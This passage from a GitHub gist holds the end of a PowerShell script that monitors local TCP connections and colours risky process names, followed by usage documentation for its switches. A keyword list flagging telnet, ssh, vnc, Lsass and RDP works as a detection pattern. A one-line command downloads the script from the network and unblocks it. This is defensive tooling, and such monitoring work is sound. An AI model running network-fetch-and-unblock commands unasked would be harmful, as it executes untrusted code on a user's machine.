ElseIf($_ -iMatch "($WarnMeOf|LDAPS|IMAPS|RDP|Mstsc|smb|netbios|Lsass|telnet|ssh|ssl|vnc|System)")
{
@{ 'ForegroundColor' = 'Red' }
}
ElseIf($_ -iMatch "(MpDefenderCoreService|MsMpEng|SecurityHealthSystray|SecurityHealthService)")
{
@{ 'ForegroundColor' = 'Green' }
}
ElseIf($_ -Match '\s+127.0.0.1\s+')
{
@{ 'ForegroundColor' = 'Gray' }
}
ElseIf($_ -Match "^(-----)")
{
@{ 'ForegroundColor' = 'Blue' }
}
Else
{
@{ 'ForegroundColor' = 'White' }
}
Write-Host @stringformat $_
}
# ProcessInfo TABLE output
If($ProcessInfo.IsPresent)
{
Start-Sleep -Milliseconds 1400
$Proctable|Format-Table -AutoSize|Out-String -Stream|select -skip 1|ForEach-Object {
$stringformat = If($_ -iMatch "(ftp|TeamViewer|svchost|Csrss|backgroundTaskHost|http|spoolsv|taskhostw|PhoneExperienceHost)")
{
@{ 'ForegroundColor' = 'Yellow' }
}
ElseIf($_ -iMatch "($WarnMeOf|LDAPS|IMAPS|RDP|Mstsc|smb|netbios|Lsass|telnet|ssh|ssl|vnc|System)")
{
@{ 'ForegroundColor' = 'Red' }
}
ElseIf($_ -iMatch "(MpDefenderCoreService|MsMpEng|SecurityHealthSystray|SecurityHealthService)")
{
@{ 'ForegroundColor' = 'Green' }
}
ElseIf($_ -Match "^(-----)")
{
@{ 'ForegroundColor' = 'Blue' }
}
Else
{
@{ 'ForegroundColor' = 'White' }
}
Write-Host @stringformat $_
}
## Invoke schedule tasks
Invoke-ScheduleTasks
}
Write-Host "-|Scan[" -NoNewline
Write-Host "${i}" -ForegroundColor Yellow -NoNewline
Write-Host ":" -NoNewline
Write-Host "${MaxScans}" -ForegroundColor Red -NoNewline
Write-Host "]$(Get-Date -Format 'HH:mm:ss')|-"
# Scan Type (manual|automatic)
Invoke-ScanTypes
## Do not clear screen if $i ...
# reachs the max of MaxScans ($MaxScans)
If($i -NotMatch "$MaxScans")
{
Clear-Host
}
}
}
## TCP Statistics
Invoke-TCPStats
## BaloonTip
Invoke-BallonTip
If($Logfile.IsPresent)
{
Write-Host "`nLogfile: " -NoNewline
Write-Host "$pwd\$LogName" -ForegroundColor Green
}
echo ""
@r00t-3xp10it
Copy link
Author

r00t-3xp10it commented Sep 18, 2025
edited
Loading

List Established TCP connections [ in loop ]

banner

Download cmdlet

iwr -uri "https://gist.githubusercontent.com/r00t-3xp10it/586346116ddbeeeaad4e9775b123d549/raw/5270f0c7b19847e29c7f145b373e0d2de93f46d2/ScanTCP.ps1" -OutFile "ScanTCP.ps1"|Unblock-File

CmdLet Parameters\Switchs Description

Parameter Switch Description Default Value
invoke - Scan for active TCP connections using: netstat OR Get-NetTCPConnection NetTCPConnection
scantype - The type of CmdLet scan [loop] to use: automatic OR manual automatic
scaneach - Scan for TCP connections each xx seconds: 3 (min) OR 15 (max) 6
maxscans - The max number of TCP scans to perform:1 (min) OR 80 (max) 10
filter - Delete from scan reports all strings: 0.0.0.0: (IPv6 addresses) 0.0.0.0:
- logfile Switch that appends scans to TCPreport_19_27_50_2025.txt not active
- process Switch to retrive the process name associated with TCP connection not active
- processinfo Print TCP connection processName detail info + loaded DLLs + Todays schedule tasks not active
warnmeof - Pops up ballontip warning that process name was found active NULL
- dns Switch that retrieves Lhost DNS resolver cache entrys [ipv4|ipv6] not active
- dll Switch to search for DLLs loaded by running processes not active
- geolocation Switch that retrieves Lhost geolocation with http://ipinfo.io not active
- mitre Switch that searchs for possible MITRE ATT&CK vulnerabilitys not active
- portscan Switch that searchs for TCP most comum [open] ports not active

EXAMPLES

Get-Help

Get-Help .\ScanTCP.ps1 -full

List TCP connections using CmdLet default settings

.\ScanTCP.ps1

List TCP connections in verbose mode (display ProcessNames and PID)

 .\ScanTCP.ps1 -Invoke NetTCPConnection -Process

List TCP connections in verbose mode (4 scans max) + filter '127.0.0.1'

 .\ScanTCP.ps1 -Invoke NetTCPConnection -MaxScans 4 -Process -filter '127.0.0.1'

List TCP connections invoking NetTCPConnection (3 scans max) +append results to logfile

.\ScanTCP.ps1 -Invoke NetTCPConnection -MaxScans 3 -LogFile

List TCP connections invoking Netstat command, scan 3 times with 2 seconds delay

.\ScanTCP.ps1 -Invoke Netstat -MaxScans 3 -ScanEach 2

List TCP connections invoking netstat command, scan 5 times (press keyboard key for new scan)

.\ScanTCP.ps1 -Invoke netstat -MaxScans 5 -ScanType manual

Setting BallonTip Warnings

Executing: -invoke 'netstat' -process -warnmeof 'svchost'
Description: Pops up one ballontip warning everytime one TCP connection related with the process svchost is found active on device
Note: We can now minimize the scantcp terminal console and still recive tcp warnings [ BallonTip ]

.\ScanTCP.ps1 -invoke 'netstat' -process -warnmeof 'SVCHOST'
warnmeof

Executing: -invoke 'NetTCPConnection' -process -warnmeof 'SVCHOST'
Description: On the next example SVCHOST process was found loading RDPCORETS.DLL [ Mitre T1021 warning ]
Note TermService service needs to be running and rdpcorets.dll loaded by svchost for device to be vulnerable
Note: Invoking -filter '127.0.0.1' parameter deletes from outputs the full line containing the sellected string

.\ScanTCP.ps1 -invoke 'NetTCPConnection' -process -warnmeof 'SVCHOST' -filter '127.0.0.1'
uau2

Executing: -invoke 'netstat' -process -processInfo (print processes loaded DLLs) -warnmeof 'AcerGAICameraW '
Description: Print process names associated with TCP connection + process loaded DLLs + warnmeof AcerGAICameraW connection

.\ScanTCP.ps1 -invoke 'netstat' -process -ProcessInfo -warnmeof 'AcerGAICameraW'
yap

Some tasks require admin privileges to be habble to extract info from service\process (print DLLs loaded)

admin6

Without administrator privileges (print DLLs loaded)

yap



STANTALONE SWITCHS (can not be used together with other parameters)

Search for DLLs loaded by running processes

.\ScanTCP.ps1 -DLL
dllsearch

List DNS resolver cache

.\ScanTCP.ps1 -dns
dns

Search for TCP high risk [open] ports

.\ScanTCP.ps1 -PortScan
tcp

List hostname geolocation

.\ScanTCP.ps1 -GeoLocation
geo

Search for possible MITRE vulnerabilitys

.\ScanTCP.ps1 -mitre
one tre encoding2 pipes

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment